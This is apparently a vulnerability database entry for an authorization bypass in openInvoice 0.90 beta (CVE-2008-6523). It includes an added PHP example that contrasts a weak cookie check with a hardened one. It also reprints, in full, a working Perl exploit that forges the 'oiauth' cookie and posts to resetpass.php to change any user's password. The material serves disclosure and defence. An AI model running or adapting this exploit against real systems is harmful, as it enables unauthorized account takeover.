openInvoice 'auth.php' Authentication/Authorization Bypass Vulnerability

Vulnerability ID: 1115031    Vulnerability type: Authorization issue
Published: 2008-04-18    Updated: 2009-03-26
CVE ID: CVE-2008-6523    CNNVD ID: CNNVD-200903-402
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/5466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-402
|Vulnerability Details
openInvoice is a small invoice-management tool that lets invoices be customised and printed to a required format and sent automatically by e-mail to the invoiced party. In openInvoice 0.90 beta and earlier, auth.php allows a remote attacker to bypass authorization and gain privileges by setting the oiauth cookie. Note: this flaw can be combined with a separate flaw in resetpass.php to change the password of an arbitrary user.
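The root cause described above is a login check that treats a client-supplied cookie value as proof of authentication. The following PHP is an added illustration written for this page, not openInvoice's own auth.php: the weak pattern the advisory describes beside a hardened version in which the cookie is only an opaque session id and the privilege decision comes from server-side state. Function names, the session store layout and the sample values are all assumptions.

```php
<?php
// Added illustration, not openInvoice source. The cookie name "oiauth" is the one
// named in the advisory; everything else here is a constructed assumption.

// WEAK pattern: the presence of a client-controlled cookie value grants access.
// Any client can send "oiauth=1" itself, so this check proves nothing about login.
function is_admin_weak(array $cookies): bool
{
    return isset($cookies['oiauth']) && $cookies['oiauth'] === '1';
}

// HARDENED pattern: the cookie carries only a random, server-issued session id.
// The role is read from server-side session state written at login time, so a
// forged cookie value simply maps to no session. (In a real deployment this is
// what PHP's session_start()/$_SESSION give you; a plain array stands in here
// so the snippet runs stand-alone.)
function is_admin_hardened(array $cookies, array $session_store): bool
{
    if (!isset($cookies['oiauth'])) {
        return false;
    }
    $sid = $cookies['oiauth'];
    if (!isset($session_store[$sid])) {
        return false;           // unknown or forged session id
    }
    return ($session_store[$sid]['role'] ?? '') === 'admin';
}

// Constructed sample data: a cookie a client could send, and the server's sessions.
$forged_cookie   = ['oiauth' => '1'];
$server_sessions = [
    // PLACEHOLDER id: a real one would come from random_bytes() at login.
    'placeholder-random-session-id' => ['uid' => 1, 'role' => 'admin'],
];

echo "weak check accepts forged cookie: ",
     is_admin_weak($forged_cookie) ? "yes" : "no", PHP_EOL;
echo "hardened check accepts forged cookie: ",
     is_admin_hardened($forged_cookie, $server_sessions) ? "yes" : "no", PHP_EOL;
```

The same principle applies to resetpass.php: a password-reset handler must derive the acting user from server-side session state, not from a uid field or cookie the request supplies.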
|Vulnerability EXP
#!/usr/bin/perl

# [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ]
# Discovered && Coded By t0pP8uZz
# Discovered On: 18 April 2008
# Vendor has not been notified!

# see exploit for more details..

# Greetz: milw0rm.com, h4ck-y0u.org, CipherCrew!

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";
print "-+-             (Discovered && Coded By t0pP8uZz)              -+-\n";
print "-+-                                                            -+-\n";
print "-+-   Discovered On: 18 April 2008 / Discovered By: t0pP8uZz   -+-\n";
print "-+- OpenInvoice 0.9 beta (and prior) Suffers from Insecure ... -+-\n";
print "-+- ...cookies and admin panel validating, combining the two.. -+-\n";
print "-+- .we can change any users password except for the 1st admin -+-\n";
print "-+-                                                            -+-\n";
print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";

print "\nEnter URL (the vuln site): ";
	chomp(my $url=<STDIN>);
	
print "\nEnter UID (the user id to change pass for): ";
	chomp(my $uid=<STDIN>);
	
my $domain = $url;
my $count = ($domain =~ tr"/"");

if($count == 1) {
	$domain =~ s/\\//;
} elsif($count >= 3) {
	$domain =~ s/http:\/\///;
}

my $cjar = HTTP::Cookies->new( file => "cookies.txt", autosave => 1 );
$cjar->set_cookie(1, "oiauth", "1", "/", "6oogle.pl");
$cjar->save("cookies.txt");

my $ua     = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 )', cookie_jar => $cjar );
my $result = $ua->post($url."/resetpass.php", { 'uid' => $uid, 'changepass' => 'Change Password' } );

if($result->is_success() && $result->content !~ /unable to change password/i && $uid != 1) {
	print "Password successfuly changed for userid: ".$uid."\n";
	exit;
}
print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1\n";
exit;

# milw0rm.com [2008-04-18]
|References

Source: XF
Name: openinvoice-cookie-security-bypass(41947)
Link: http://xforce.iss.net/xforce/xfdb/41947
Source: BID
Name: 28854
Link: http://www.securityfocus.com/bid/28854
Source: MILW0RM
Name: 5466
Link: http://www.milw0rm.com/exploits/5466